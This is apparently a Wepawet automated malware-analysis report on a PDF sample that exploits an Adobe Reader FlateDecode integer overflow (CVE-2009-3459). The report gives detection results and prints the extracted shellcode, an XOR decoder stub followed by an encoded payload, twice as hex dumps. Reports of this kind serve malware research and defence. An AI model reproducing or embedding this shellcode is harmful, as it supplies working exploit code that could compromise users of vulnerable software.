Wepawet

Analysis report for file 9ef0794d27d89470ad95a57e2a58adb7

Sample Overview¶

File	9ef0794d27d89470ad95a57e2a58adb7.pdf.vir
MD5	9ef0794d27d89470ad95a57e2a58adb7
Analysis Started	2013-04-07 20:20:55
Report Generated	2013-04-07 20:21:03
Jsand version	2.3.6

Detection results¶

Detector	Result
Jsand 2.3.6	malicious

In particular, the following URL was found to contain malicious content:

file://9ef0794d27d89470ad95a57e2a58adb7/

Exploits¶

Name	Description	Reference
FlateDecode Colors	Integer overflow in Adobe Acrobat and Reader via crafted FlateDecode Colors parameter	CVE-2009-3459

Deobfuscation results¶

Evals

No evals.

Writes

No writes.

Network Activity¶

Requests

URL
file://9ef0794d27d89470ad95a57e2a58adb7.pdf.vir

ActiveX controls¶

No objects/controls.

Shellcode¶

Hexadecimal	ASCII
33 c9 66 b9 84 01 eb 0d 5e 56 8a 06 32 c1 88 06 46 49 75 f6 c3 e8 ee ff ff ff d1 08 6e 02 6c 23 2d 2b 2b bc 3f 89 6b 77 76 75 9d 6d 73 71 70 e0 2b 91 08 ca 5a 69 68 67 ed 25 68 e8 12 7d cd d4 06 55 d5 06 b6 d2 15 a7 dd 28 a8 02 d9 14 bc c4 3e 71 c7 3f 4c 31 4b b7 10 ce 32 63 41 b1 73 f6 77 7c 91 38 7f d5 0b ec 39 8b 24 09 e4 45 38 ee e5 20 2f f1 6a c2 d9 1c 39 50 c2 7d a9 7f 04 1c 43 f1 7a 90 16 52 93 49 0a 16 49 ff 99 15 9b 0c 4b e1 a7 52 e8 bc 3b c7 8f 40 ec 8a 47 e5 83 ba 1a f9 96 fb 71 bc 1c a7 7d b8 08 0c a3 e9 79 aa 1a 6e 91 1f 15 9d 85 66 9b 11 e4 c3 e2 e1 9d dd 35 bf b6 9b b2 d9 c8 d7 d6 5e 81 27 80 bb d0 44 8b 31 33 9b f6 40 8d 3f ac c5 ae c3 a8 c1 4b f2 5a ec 37 ee 46 46 ea 83 dc b5 39 f6 5a e1 3b e2 5a fc 27 fe 52 fb 23 e2 42 f5 2f ee 5e 5e f1 af 15 c8 64 98 cf 6d 19 ed 6a f0 fb f5 98 e4 92 64 ae e5 8c 0b 8a 89 03 c2 72 d5 0f ce 7a d0 0b 2a 82 82 2e 3b c2 78 78 77 76 f0 b4 7c f7 1c 8f 90 91 e6 19 93 59 a0 29 e6 5a 6b 01 0c 04 6b 15 a9 dd 9c 58 58 ab a6 2d ab a9 20 b0 ac 84 b9 8d b1 b1 b2 b7 dc b7 46 16 ce aa dc e1 54 42 3d 32 c1 8d 2b da 2c b5 42 48 44 d9 03 99 a8 4f ee 46 42 9e 68 14 09 86 ce 1b ed ac 7e aa 6d 2c cd da 88 1c 51 0a 7e e0 09 b4 1f cc 63 97 aa a7 69 44 c5 a1 9c a0 38 0c 0a 90 f9 8c 0b 1b 7a 08 e9	3.f.....^V..2... FIu.........n.l# -++.?.kwvu.msqp. +...Zihg.%h..}.. .U.......(...... >q.?L1K...2cA.s. w\|.8....9.$..E8. ../.j...9P.}.... C.z..R.I..I..... K..R..;..@..G... ....q...}.....y. .n.....f........ 5........^.'...D .13..@.?......K. Z.7.FF....9.Z.;. Z.'.R.#.B./.^^.. ..d..m..j......d ........r...z..* ...;.xxwv..\|.... ....Y.).Zk...k.. ..XX..-......... .....F.....TB=2. .+.,.BHD....O.FB .h.......~.m,... .Q.~.....c...iD. ...8.......z..

Hexadecimal

ASCII

33 c9 66 b9 84 01 eb 0d  5e 56 8a 06 32 c1 88 06 
46 49 75 f6 c3 e8 ee ff  ff ff d1 08 6e 02 6c 23 
2d 2b 2b bc 3f 89 6b 77  76 75 9d 6d 73 71 70 e0 
2b 91 08 ca 5a 69 68 67  ed 25 68 e8 12 7d cd d4 
06 55 d5 06 b6 d2 15 a7  dd 28 a8 02 d9 14 bc c4 
3e 71 c7 3f 4c 31 4b b7  10 ce 32 63 41 b1 73 f6 
77 7c 91 38 7f d5 0b ec  39 8b 24 09 e4 45 38 ee 
e5 20 2f f1 6a c2 d9 1c  39 50 c2 7d a9 7f 04 1c 
43 f1 7a 90 16 52 93 49  0a 16 49 ff 99 15 9b 0c 
4b e1 a7 52 e8 bc 3b c7  8f 40 ec 8a 47 e5 83 ba 
1a f9 96 fb 71 bc 1c a7  7d b8 08 0c a3 e9 79 aa 
1a 6e 91 1f 15 9d 85 66  9b 11 e4 c3 e2 e1 9d dd 
35 bf b6 9b b2 d9 c8 d7  d6 5e 81 27 80 bb d0 44 
8b 31 33 9b f6 40 8d 3f  ac c5 ae c3 a8 c1 4b f2 
5a ec 37 ee 46 46 ea 83  dc b5 39 f6 5a e1 3b e2 
5a fc 27 fe 52 fb 23 e2  42 f5 2f ee 5e 5e f1 af 
15 c8 64 98 cf 6d 19 ed  6a f0 fb f5 98 e4 92 64 
ae e5 8c 0b 8a 89 03 c2  72 d5 0f ce 7a d0 0b 2a 
82 82 2e 3b c2 78 78 77  76 f0 b4 7c f7 1c 8f 90 
91 e6 19 93 59 a0 29 e6  5a 6b 01 0c 04 6b 15 a9 
dd 9c 58 58 ab a6 2d ab  a9 20 b0 ac 84 b9 8d b1 
b1 b2 b7 dc b7 46 16 ce  aa dc e1 54 42 3d 32 c1 
8d 2b da 2c b5 42 48 44  d9 03 99 a8 4f ee 46 42 
9e 68 14 09 86 ce 1b ed  ac 7e aa 6d 2c cd da 88 
1c 51 0a 7e e0 09 b4 1f  cc 63 97 aa a7 69 44 c5 
a1 9c a0 38 0c 0a 90 f9  8c 0b 1b 7a 08 e9

3.f.....^V..2...
FIu.........n.l#
-++.?.kwvu.msqp.
+...Zihg.%h..}..
.U.......(......
>q.?L1K...2cA.s.
w|.8....9.$..E8.
../.j...9P.}....
C.z..R.I..I.....
K..R..;..@..G...
....q...}.....y.
.n.....f........
5........^.'...D
.13..@.?......K.
Z.7.FF....9.Z.;.
Z.'.R.#.B./.^^..
..d..m..j......d
........r...z..*
...;.xxwv..|....
....Y.).Zk...k..
..XX..-.........
.....F.....TB=2.
.+.,.BHD....O.FB
.h.......~.m,...
.Q.~.....c...iD.
...8.......z..

This shellcode was found on file://9ef0794d27d89470ad95a57e2a58adb7/.

(shellzer's analysis not available: an error was encountered when analyzing this shellcode.)

Malware¶

No additional malware was retrieved.

FEEDBACK